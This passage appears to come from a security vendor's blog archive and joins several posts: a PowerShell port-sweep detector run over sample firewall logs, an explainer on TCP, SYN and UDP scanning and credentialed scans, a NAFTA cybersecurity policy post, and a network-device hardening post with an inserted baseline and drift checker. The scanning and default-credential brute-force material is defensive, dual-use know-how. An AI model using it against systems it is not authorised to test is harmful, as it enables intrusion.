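2017-07-27 10:15:03 DROP TCP 192.0.2.10 198.51.100.5 51238 53 52 S 1005 0 65535 - - - RECEIVE
2017-07-27 10:15:04 ALLOW TCP 192.0.2.10 198.51.100.5 51239 80 52 S 1006 0 65535 - - - RECEIVE
2017-07-27 10:15:05 DROP TCP 192.0.2.10 198.51.100.5 51240 110 52 S 1007 0 65535 - - - RECEIVE
2017-07-27 10:15:06 DROP TCP 192.0.2.10 198.51.100.5 51241 135 52 S 1008 0 65535 - - - RECEIVE
2017-07-27 10:15:07 DROP TCP 192.0.2.10 198.51.100.5 51242 139 52 S 1009 0 65535 - - - RECEIVE
2017-07-27 10:15:08 DROP TCP 192.0.2.10 198.51.100.5 51243 143 52 S 1010 0 65535 - - - RECEIVE
2017-07-27 10:15:09 ALLOW TCP 192.0.2.10 198.51.100.5 51244 443 52 S 1011 0 65535 - - - RECEIVE
2017-07-27 10:15:10 DROP TCP 192.0.2.10 198.51.100.5 51245 445 52 S 1012 0 65535 - - - RECEIVE
2017-07-27 10:15:03 ALLOW TCP 192.0.2.20 198.51.100.5 40001 443 52 S 2001 0 65535 - - - RECEIVE
2017-07-27 10:16:10 ALLOW TCP 192.0.2.20 198.51.100.5 40002 443 52 S 2002 0 65535 - - - RECEIVE
2017-07-27 10:17:22 ALLOW TCP 192.0.2.20 198.51.100.5 40003 443 52 S 2003 0 65535 - - - RECEIVE
'@

function ConvertFrom-PfirewallLog {
    # Turn the space-separated log into objects, using the #Fields header for names.
    param([string[]]$Lines)
    $fields = $null
    foreach ($line in $Lines) {
        if ($line -match '^#Fields:\s*(.+)$') { $fields = $Matches[1].Trim() -split '\s+'; continue }
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line) -or -not $fields) { continue }
        $values = $line.Trim() -split '\s+'
        if ($values.Count -ne $fields.Count) { continue }   # skip malformed lines
        $entry = [ordered]@{}
        for ($i = 0; $i -lt $fields.Count; $i++) { $entry[$fields[$i]] = $values[$i] }
        $entry['timestamp'] = [datetime]::ParseExact("$($values[0]) $($values[1])",
                                  'yyyy-MM-dd HH:mm:ss', [cultureinfo]::InvariantCulture)
        [pscustomobject]$entry
    }
}

function Find-PortSweep {
    param([object[]]$Entries, [int]$MinDistinctPorts = 10, [int]$WindowSeconds = 60)
    # Inbound TCP packets with SYN set and ACK clear are new connection attempts,
    # which is the first packet of both a TCP connect scan and a SYN scan.
    $syns = $Entries | Where-Object {
        $_.protocol -eq 'TCP' -and $_.path -eq 'RECEIVE' -and
        $_.tcpflags -like '*S*' -and $_.tcpflags -notlike '*A*'
    }
    foreach ($group in ($syns | Group-Object 'src-ip')) {
        $sorted = @($group.Group | Sort-Object timestamp)
        $peak = 0
        # Sliding window: from each packet, count distinct destination ports hit
        # within the next $WindowSeconds and keep the busiest window.
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].timestamp
            $end   = $start.AddSeconds($WindowSeconds)
            $ports = @($sorted | Where-Object { $_.timestamp -ge $start -and $_.timestamp -le $end } |
                       Select-Object -ExpandProperty 'dst-port' -Unique)
            if ($ports.Count -gt $peak) { $peak = $ports.Count }
        }
        if ($peak -ge $MinDistinctPorts) {
            [pscustomobject]@{
                SourceIp      = $group.Name
                DistinctPorts = $peak
                WindowSeconds = $WindowSeconds
                FirstSeen     = $sorted[0].timestamp
                LastSeen      = $sorted[-1].timestamp
            }
        }
    }
}

$entries = ConvertFrom-PfirewallLog -Lines ($SampleLog -split "`r?`n")
Find-PortSweep -Entries $entries | Format-Table -AutoSize
```

The threshold and window are the tuning knobs: a sweep of a handful of ports spread across an hour will not trip this rule, which is the trade-off any IDS signature for scanning makes between catching slow scans and flagging ordinary clients.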

Credentialed vs. Uncredentialed Scans

Uncredentialed network scanning allows an analyst to gather information regarding running services and their respective locations. In practice, port scanning gives you insight into what an attacker can find out about your network without having credentialed access. This information could help you pinpoint weaknesses in your systems by identifying factors such as outdated services, open and commonly vulnerable ports. Tenable.io offers three types of port scanning: TCP, SYN, and UDP. UDP scanning is rarely used due to the fundamental inaccuracy and speed constraints of the scanning method.

How to Execute TCP, SYN, and UDP Scans

Tenable.io’s scan policy templates can be configured to scan some or all ports. For example, the Host Discovery Scan template is very useful for identifying assets on your network. You can select “Port scan” under the Basic section of the scan settings. By default, the Host Discovery port scanner uses the TCP scan technique, falling back to a SYN scan if the TCP scan attempts are blocked by a firewall.

Host Disc PS

If you want to configure the scan yourself, select the “Custom” option in the “Scan Type” field.

Host Disc Custom

Then go to “Port Scanning” and scroll down to the “Network Port Scanners” section. There you can choose any or all of the TCP, SYN and UDP port scanners.

Scan Opts Page

For the TCP and SYN port scanners, you also have the option to override some of the firewall detection features (firewall detection is performed by Nessus Plugin ID 27576). “Aggressive detection” runs plugins even if a port appears to be closed. “Soft detection” disables the check that determines whether a downstream network device is rate-limiting the resets it sends. Finally, “Disable detection” turns off the firewall detection feature entirely.

Scanning More Than Just Ports

Port scanning can serve as a good starting point to understand and measure your Cyber Exposure, but external scans are just one part of understanding your organization’s Cyber Exposure. Once an uncredentialed network scan has been completed, you can continue with a more fine-tuned, credentialed scan.

You can input credentials manually, upload a file, or even have Tenable.io brute force default/weak credentials in the “Brute Force” section of “Settings” in an Advanced Scan Policy. An uncredentialed scan may demonstrate what your network looks like from the outside, but it is equally, if not more, important to take a look on the inside. Credentialed scans allow you to audit specific applications, evaluate program checksums against Tenable’s malware database, search through the file system of a computer and even scan individual file contents.

So, What Did I learn?

By scanning the lab, not only did I become more familiar with the Tenable.io platform, but I also learned the value of timing in vulnerability analysis. Scanning is not just about getting the information you need, it’s about getting that information as efficiently and effectively as possible.

Learning how to prioritize and map out your scans is essential to successfully managing, measuring and reducing your organization’s Cyber Exposure. With the expansion of IoT and container technology, attack surfaces are only growing, making this skill even more critical.

Tenable.io provides visibility into any asset on any computing platform and allows you to schedule scans on a regular basis, ensuring you always have the most useful, up-to-date information. Start a free 60-day trial of Tenable.io for your organization today.

Cybersecurity’s role in U.S. trade agreements, starting with NAFTA

Cybersecurity is a major global economic force, with spending estimated to reach more than $100 billion by 2018, and more than $170 billion by 2020. North America has the largest cybersecurity market in the world, and the United States accounts for the biggest portion, making the industry an important source of well-paying, high-value jobs.

Digital security is critical to every industry, from healthcare and finance to manufacturing and agriculture. But the nature of today’s global networks means that cyberattacks do not stop at national borders. Security lapses abroad can cause catastrophic harm to U.S. businesses, our critical infrastructure and economy. To increase both economic and national security, it’s imperative that U.S. cybersecurity companies continue to innovate both at home and abroad. 

Later this week, the federal government has an opportunity to help better protect U.S. businesses by conveying the U.S. priority on establishing international cybersecurity norms as part of the renegotiation of the North American Free Trade Agreement (NAFTA). Secure computing has become paramount in the global digital economy. We must modernize our trade agreements to incorporate cybersecurity cooperation, and cooperation with our closest neighbors through NAFTA is a good place to start.

Cybersecurity Cooperation 

That’s why Tenable joined fellow cybersecurity industry leaders in writing a letter to United States Trade Representative (USTR) Robert Lighthizer and Secretary of Commerce Wilbur Ross, urging the inclusion of cybersecurity cooperation in renegotiation efforts. While digital goods and services were included in the recently released negotiating objectives, a robust discussion of how to work toward global cybersecurity standards and global norms would serve all parties’ collective interests.

There is widespread agreement, even among industry competitors, on the value of international cybersecurity standards. Among other benefits, these standards seek to discourage the use of cybersecurity-related trade barriers, such as data localization, and provide greater security to U.S. businesses by raising the baseline cybersecurity level of trading partners.

One of the most effective ways to protect our nation from cybercriminals is to make cybersecurity an economic priority and a trade incentive as part of all trade agreement negotiations.

Risk Management & Encryption 

In our letter, we also urged USTR to promote voluntary cyber risk management frameworks, like the National Institute of Standards and Technology (NIST) Cybersecurity Framework, among the parties involved in NAFTA. The NIST Framework has seen widespread adoption across the private and public sectors in the U.S. due to its flexible, voluntary standards and the fact that it was developed in a transparent, multi-stakeholder process. Alignment around this kind of framework would be equally valuable among North American trade partners.

Encryption also plays an important role in establishing international cybersecurity standards. As part of the renegotiation efforts, NAFTA should prohibit governments from requiring access to encryption keys and source code as a condition for market access.

Reframing Cybersecurity's Role

In today’s digital world, every company is a technology company. We can’t afford to overlook the importance of making cybersecurity a critical component of daily business, both in the U.S. and overseas. I believe this starts by reimagining and reframing cybersecurity’s role in international trade agreements. If our governments can work together to make it harder for cyber adversaries to succeed, we all benefit.


Secure Configuration Baselines for Network Devices

In a recent blog post, Ted Gary discussed results from a Tenable survey about configuration hardening at the system level. In short, organizations are making progress on enforcing and auditing their desktops and servers for secure configurations, but there is still a lot of work to do. While the whole realm of network devices was beyond the scope of the survey, it obviously can’t be beyond that of your hardening efforts.

Background

Many of the standard frameworks use an umbrella approach for recommending configuration baselines and treat all devices and endpoints equally:

NIST Cybersecurity Framework

PR.IP-1 - A baseline configuration of information technology/industrial control systems is created and maintained.

NIST 800-53 rev 4

CM-2 - Baseline Configuration
CM-2(1) - Reviews and Updates

ITSG-33 (Canada)

CM-2 - Baseline Configuration
CM-2(1) - Reviews and Updates
CM-2(2) - Automation Support for Accuracy/ Currency

Some frameworks and standards, like the Center for Internet Security (CIS) Controls and Payment Card Industry Data Security Standard (PCI-DSS), see the management of the network itself as important enough to justify its own sections and recommendations, in addition to their general system requirements.

CIS Controls

11 - Secure Configurations for Network Devices

PCI-DSS

1.1 - Establish and implement firewall and router configuration standards.
1.1.7.a - Verify that firewall and router configuration standards require review.
2.2 - Develop configuration standards for all system components.

The central theme of all of these recommendations across the various frameworks is fundamentally a threefold process.

  1. Design and implement a secure hardened baseline across the devices in your organization.
  2. Monitor and validate that the baseline has been implemented and drift doesn’t occur.
  3. Periodically review the baseline and update it according to new threats and the ever-evolving environment.

Some of the best starting places for building a secure baseline for a number of devices are the CIS Benchmarks and the Defense Information Systems Agency (DISA) Security Technical Implementation Guides (STIGs). These resources provide technical hardening recommendations for many popular and widely implemented devices.

If a particular device in your environment is not covered by a CIS Benchmark or DISA STIG, all hope is not lost. Most vendors provide their own stand-alone hardening guides. For example, Juniper Networks published their own guide, “Hardening Junos Devices”. Much like in the desktop and server environment, there’s a chance that none of the recommendations will be a perfect fit out-of-the-box for all environments. If that’s the case, you may need to tailor one guide, or combine several, in order to get a complete baseline. The important lesson here is that multiple resources exist to help you build the initial baselines and avoid having to start with a blank slate.
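Steps 1 and 2 of the threefold process above (define a baseline, then validate it and watch for drift) can be shown in miniature. This is an added example, not Tenable’s audit language or any CIS or DISA content: a handful of baseline rules expressed as regular expressions, applied to a constructed Cisco IOS-style running configuration, plus a line-level drift report against a constructed golden copy. The rule identifiers and both configurations are my own sample data.

```powershell
# Added example, not from the Tenable post or a Tenable audit file: validate a
# router configuration against a small hardening baseline and report drift from
# a golden copy. Both configurations are constructed, IOS-style sample text.
$GoldenConfig = @'
hostname edge-rtr-01
service password-encryption
no ip http server
no ip http secure-server
ip ssh version 2
ntp server 192.0.2.50
logging host 192.0.2.60
line vty 0 4
 transport input ssh
 exec-timeout 10 0
'@

# The running config has drifted: HTTPS management came back on, and telnet
# was re-enabled on the VTY lines alongside SSH.
$RunningConfig = @'
hostname edge-rtr-01
service password-encryption
no ip http server
ip http secure-server
ip ssh version 2
ntp server 192.0.2.50
logging host 192.0.2.60
line vty 0 4
 transport input telnet ssh
 exec-timeout 10 0
'@

# Baseline rules: each has a regex the config must match (Require) or must not
# match (Forbid). Rule ids are invented; the themes mirror common hardening guides.
$Baseline = @(
    @{ Id = 'PWD-ENC';   Description = 'Passwords stored encrypted';      Require = '(?m)^service password-encryption$' }
    @{ Id = 'NO-HTTP';   Description = 'HTTP management disabled';         Require = '(?m)^no ip http server$' }
    @{ Id = 'NO-HTTPS';  Description = 'HTTPS management disabled';        Require = '(?m)^no ip http secure-server$' }
    @{ Id = 'SSH-V2';    Description = 'SSH protocol version 2 only';      Require = '(?m)^ip ssh version 2$' }
    @{ Id = 'NTP';       Description = 'NTP server configured';            Require = '(?m)^ntp server \S+' }
    @{ Id = 'SYSLOG';    Description = 'Remote syslog host configured';    Require = '(?m)^logging host \S+' }
    @{ Id = 'VTY-SSH';   Description = 'VTY lines accept SSH only';        Require = '(?m)^ transport input ssh$' }
    @{ Id = 'NO-TELNET'; Description = 'Telnet not accepted on VTY lines'; Forbid  = '(?m)^ transport input .*telnet' }
)

function Test-Baseline {
    # Evaluate every rule against the configuration text; returns one row per rule.
    param([string]$Config, [object[]]$Rules)
    foreach ($rule in $Rules) {
        if ($rule.Require) { $passed = $Config -match $rule.Require }
        else               { $passed = -not ($Config -match $rule.Forbid) }
        $result = if ($passed) { 'PASS' } else { 'FAIL' }
        [pscustomobject]@{ Id = $rule.Id; Description = $rule.Description; Result = $result }
    }
}

function Get-ConfigDrift {
    # Line-level comparison of the running config with the golden baseline.
    param([string]$Golden, [string]$Running)
    $g = $Golden  -split "`r?`n" | Where-Object { $_ -ne '' }
    $r = $Running -split "`r?`n" | Where-Object { $_ -ne '' }
    Compare-Object -ReferenceObject $g -DifferenceObject $r | ForEach-Object {
        $change = if ($_.SideIndicator -eq '=>') { 'added' } else { 'missing' }
        [pscustomobject]@{ Change = $change; Line = $_.InputObject }
    }
}

"== Baseline checks against the running config =="
Test-Baseline -Config $RunningConfig -Rules $Baseline | Format-Table -AutoSize

"== Drift from the golden config =="
Get-ConfigDrift -Golden $GoldenConfig -Running $RunningConfig | Format-Table -AutoSize
```

Against the sample running config, NO-HTTPS, VTY-SSH and NO-TELNET fail and the drift report shows the two added and two missing lines that explain why. Running the same rules over an exported configuration file before a change is rolled out is the offline-audit workflow discussed later in this post.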

Tenable Solutions

Tenable's secure configuration auditing solutions provide a number of audit files for network devices. Right alongside your regular vulnerability scanning you can test and validate the configuration baselines you defined for the organization. These audit files cover a wide range of devices from Cisco and Juniper to Palo Alto Networks and Huawei. Any of these devices can be evaluated for a number of different configuration parameters and generally have multiple audit files available.

Most of the audit files are built according to the CIS Benchmark or DISA STIG recommendations, which in general overlap quite a bit. For example, testing DNS and NTP server settings, validating whether specific services or protocols are enabled and/or configured correctly, and checking that accounts and authentication are set up properly for local and remote management are all included in both standards and have checks in Tenable audit files.

If your organization requires a hybrid or tailored version of one of the benchmark documents, a completely custom audit file can be created or, in many cases, one of the standard files can be customized by adding/removing checks or modifying acceptable values.

Palo Alto

Recent Additions (F5 and Arista Devices)

Recently, Tenable has added support for additional network devices, specifically F5 BigIP and Arista MLS devices.

Our support for F5 covers a number of its technologies from the Advanced Firewall Manager and Application Security Manager to Device and Local Traffic Management.

Alongside these new plugins are accompanying audits based on the DISA STIG guidance that has been released. A full list of available DISA STIG documents is available from the DISA Information Assurance Support Environment (IASE) homepage.

F5

Scans of F5 devices are very similar to many of the existing network device scans. F5 scans can be initiated from either the Advanced Scan or the Policy Compliance template. Inside either of those templates you should find a new entry for the F5 credentials under Miscellaneous in the Credentials tab.

F5 Preferences

Under the Compliance tab, you should also see a new entry for F5, which allows the upload of custom audit files in addition to the list of audit files Tenable has released.

Arista

Like F5 devices, online Arista scans can be initiated from both the Advanced Scan and Policy Compliance templates. For online scans, an SSH login is required and the credentials are stored just like any other SSH login. A new Arista section contains the custom audit upload along with the list of Tenable-provided audits.

Offline Audit Support

Arista devices can also be audited in offline mode which is often convenient for validating backed-up configurations or testing a baseline configuration before it's rolled out. Offline scans are configured via the Offline Configuration Audit template.

An offline scan doesn’t require any credentials, so an SSH login is unnecessary. Setting up the audit only requires you to select an audit file or upload your custom audit and then add the configuration file you would like to be evaluated on the Compliance tab.

Wrap-Up

When planning the baseline hardening for network devices, it’s important to keep in mind that, in most cases, issues with devices such as firewalls, routers and load balancers will ripple across the environment. A device’s configuration isn’t limited to providing its own services and protecting itself; it also plays a significant role in most organizations’ layered security practices. A compromised firewall doesn’t just mean it isn’t filtering and passing traffic; it might also be putting other devices at risk from threats they are unable, or not configured, to handle.

How Tenable Can Help

Tenable products offer a wide range of audit files for most popular network device platforms like Cisco, Juniper and Huawei, along with the addition of F5 and Arista. Many of these can be conducted both online against running systems and in offline mode against an exported configuration file. This offline support often proves very handy in developing a secure baseline since changes can be tested and the results are available immediately against your chosen audit file.
